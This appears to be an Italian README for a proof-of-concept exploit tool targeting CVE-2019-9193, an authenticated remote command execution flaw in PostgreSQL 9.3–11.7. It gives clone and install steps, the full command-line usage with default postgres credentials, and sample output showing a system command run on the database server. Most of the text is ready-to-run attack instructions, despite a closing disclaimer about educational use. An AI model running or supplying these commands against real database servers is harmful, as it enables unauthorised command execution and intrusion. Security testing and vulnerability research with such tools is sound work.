
è uno strumento PoC progettato per sfruttare una vulnerabilità di esecuzione remota di codice (RCE) autenticata in versioni specifiche di PostgreSQL (9.3 - 11.7)
GenPostgresRCEExploit è uno strumento PoC progettato per sfruttare una vulnerabilità di Remote Code Execution (RCE) autenticata in versioni specifiche di PostgreSQL (9.3 - 11.7). Consente a utenti autenticati di eseguire comandi di sistema su un server di database PostgreSQL vulnerabile a CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <ip_destinazione> -p <porta> -d <nome_database> -U <utente> -P <password> -c "<comando_sistema>"
-i, --ip: Indirizzo IP del server PostgreSQL (Predefinito: 127.0.0.1)-p, --port: Porta del server PostgreSQL (Predefinito: 5432)-d, --database: Nome del database PostgreSQL (Predefinito: template1)-U, --user: Nome utente per connettersi al server PostgreSQL (Predefinito: postgres)-P, --password: Password per connettersi al server PostgreSQL (Predefinito: postgres)-c, --command: Comando di sistema da eseguire sul server-t, --timeout: Timeout di connessione in secondi (Predefinito: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Questo esempio si connette a un server PostgreSQL su 192.168.1.10, si autentica con le credenziali fornite ed esegue il comando whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Connessione al database PostgreSQL su 192.168.1.10:5432
[+] Connessione stabilita con successo
[+] Verifica versione PostgreSQL
[+] Versione vulnerabile di PostgreSQL rilevata: 10.4
[+] Creazione tabella temporanea: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Comando eseguito con successo
postgres
Questo strumento è destinato esclusivamente a scopi educativi e test etici. L'uso non autorizzato di questo strumento contro qualsiasi sistema è illegale e severamente vietato. Gli autori non si assumono alcuna responsabilità per eventuali usi impropri.